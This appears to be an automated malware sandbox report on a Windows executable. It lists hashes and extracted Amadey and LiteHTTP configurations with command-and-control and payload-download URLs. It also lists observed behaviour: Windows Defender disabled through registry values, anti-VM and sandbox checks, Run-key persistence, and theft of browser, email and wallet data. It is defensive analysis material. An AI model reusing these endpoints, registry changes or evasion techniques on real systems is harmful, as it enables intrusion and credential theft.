Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05/03/2025, 19:48
Static task
static1
Behavioral task
behavioral1
Sample
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
Resource
win10v2004-20250217-en
General
-
Target
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
-
Size
1.8MB
-
MD5
6b38db8d1cadb7a58f0bd9f9d281646a
-
SHA1
f56be70672c257dc68cfb0b9a0781569070b122b
-
SHA256
899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1
-
SHA512
6ac8fbbd65da962674112f1ec89fe62c9ceb470e9c6fb7fdd9f1654d8f501b71bc6409fd08b43d8f38d2229ce1964bcbc14ae7ccbad0613a51943d9631fe20ca
-
SSDEEP
49152:DerWqI+PXK2ZRVtlhQXXPjeDXDrC7bbnh:DeCqXa2ZRVJo2X3C7bbh
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/920-1890-0x0000000000200000-0x000000000066A000-memory.dmp healer behavioral1/memory/920-1888-0x0000000000200000-0x000000000066A000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" f8860f532a.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" f8860f532a.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" f8860f532a.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" f8860f532a.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae09e8f5c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 20b1824b6e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 696151d304.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 784126e897.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f8860f532a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 099b641ade.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 772 powershell.exe 7 992 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1628 powershell.exe 4888 powershell.exe 4664 powershell.exe 5336 powershell.exe 1928 powershell.exe 2420 powershell.exe 868 powershell.exe 772 powershell.exe 992 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 20 IoCs
flow pid Process 7 992 powershell.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 5 2664 rapes.exe 11 2508 BitLockerToGo.exe 15 772 BitLockerToGo.exe 119 2664 rapes.exe 119 2664 rapes.exe 119 2664 rapes.exe 132 2664 rapes.exe 132 2664 rapes.exe 132 2664 rapes.exe 6 772 powershell.exe -
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0006000000019625-3394.dat net_reactor behavioral1/memory/2316-3407-0x0000000000AE0000-0x0000000000B40000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f8860f532a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 784126e897.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 20b1824b6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 20b1824b6e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae09e8f5c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 099b641ade.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f8860f532a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 099b641ade.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae09e8f5c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 696151d304.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 696151d304.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 784126e897.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs AhFKwnS.exe -
Executes dropped EXE 36 IoCs
pid Process 2664 rapes.exe 2900 ce4pMzk.exe 1416 7c581e7a04.exe 1568 TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE 2880 483d2fa8a0d53818306efeb32d3.exe 2788 20b1824b6e.exe 3040 f995140a63.exe 1912 f995140a63.exe 636 f995140a63.exe 296 f995140a63.exe 2460 099b641ade.exe 1672 AhFKwnS.exe 1184 ae09e8f5c6.exe 3456 696151d304.exe 908 784126e897.exe 4848 1566acddfa.exe 920 f8860f532a.exe 4048 AhFKwnS.exe 6812 v6Oqdnc.exe 7148 OEHBOHk.exe 4312 MCxU5Fj.exe 4364 MCxU5Fj.exe 2124 Y87Oyyz.exe 2236 Y87Oyyz.exe 2892 SplashWin.exe 2776 SplashWin.exe 3368 ce4pMzk.exe 472 Process not Found 4648 ckonftponqgz.exe 2316 mAtJWNv.exe 1432 mAtJWNv.exe 3108 mAtJWNv.exe 5564 SvhQA35.exe 5840 chromium.exe 2248 FvbuInU.exe 6548 Ps7WqSx.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 20b1824b6e.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 099b641ade.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine ae09e8f5c6.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 696151d304.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 784126e897.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine f8860f532a.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine v6Oqdnc.exe -
Loads dropped DLL 64 IoCs
pid Process 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 2664 rapes.exe 2664 rapes.exe 772 powershell.exe 772 powershell.exe 992 powershell.exe 992 powershell.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 3040 f995140a63.exe 3040 f995140a63.exe 3040 f995140a63.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 628 WerFault.exe 628 WerFault.exe 628 WerFault.exe 628 WerFault.exe 628 WerFault.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 5076 WerFault.exe 5076 WerFault.exe 5076 WerFault.exe 5076 WerFault.exe 5076 WerFault.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 3920 WerFault.exe 3920 WerFault.exe 3920 WerFault.exe 2664 rapes.exe 2664 rapes.exe 2508 BitLockerToGo.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 772 BitLockerToGo.exe 6708 WerFault.exe 6708 WerFault.exe 6708 WerFault.exe 6708 WerFault.exe 6708 WerFault.exe 2664 rapes.exe 2664 rapes.exe 6984 WerFault.exe 6984 WerFault.exe 6984 WerFault.exe 2664 rapes.exe 2664 rapes.exe 2664 rapes.exe 4312 MCxU5Fj.exe 4552 WerFault.exe 4552 WerFault.exe 4552 WerFault.exe 4552 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features f8860f532a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" f8860f532a.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c581e7a04.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105750101\\7c581e7a04.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105760121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\CMnYnzVl\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\696151d304.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106210101\\696151d304.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\784126e897.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106220101\\784126e897.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\1566acddfa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106230101\\1566acddfa.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\f8860f532a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10106240101\\f8860f532a.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3660 powercfg.exe 3220 powercfg.exe 5088 powercfg.exe 5048 powercfg.exe 4992 powercfg.exe 4976 powercfg.exe 3916 powercfg.exe 3872 powercfg.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000019441-42.dat autoit_exe behavioral1/files/0x000500000001a4ca-1722.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2412 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 2664 rapes.exe 1568 TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE 2880 483d2fa8a0d53818306efeb32d3.exe 2788 20b1824b6e.exe 2460 099b641ade.exe 1184 ae09e8f5c6.exe 3456 696151d304.exe 908 784126e897.exe 920 f8860f532a.exe 6812 v6Oqdnc.exe 2248 FvbuInU.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3040 set thread context of 296 3040 f995140a63.exe 63 PID 2788 set thread context of 2508 2788 20b1824b6e.exe 66 PID 2460 set thread context of 772 2460 099b641ade.exe 71 PID 4312 set thread context of 4364 4312 MCxU5Fj.exe 105 PID 2776 set thread context of 340 2776 SplashWin.exe 114 PID 4648 set thread context of 1536 4648 ckonftponqgz.exe 144 PID 4648 set thread context of 2268 4648 ckonftponqgz.exe 150 PID 2316 set thread context of 3108 2316 mAtJWNv.exe 154 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4284 sc.exe 4440 sc.exe 4572 sc.exe 4588 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 2368 3040 WerFault.exe 60 628 296 WerFault.exe 63 5076 1672 WerFault.exe 69 3920 3456 WerFault.exe 74 6708 4048 WerFault.exe 99 6984 6812 WerFault.exe 101 4552 4312 WerFault.exe 104 1864 4364 WerFault.exe 105 4848 2316 WerFault.exe 152 -
System Location Discovery: System Language Discovery 1 TTPs 50 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f995140a63.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 099b641ade.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 696151d304.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 784126e897.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y87Oyyz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7c581e7a04.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae09e8f5c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20b1824b6e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f995140a63.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1566acddfa.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 1566acddfa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AhFKwnS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 1566acddfa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f8860f532a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2520 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 4888 taskkill.exe 5032 taskkill.exe 3512 taskkill.exe 2948 taskkill.exe 1056 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60d5ebc5078edb01 powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 FvbuInU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a FvbuInU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 ae09e8f5c6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 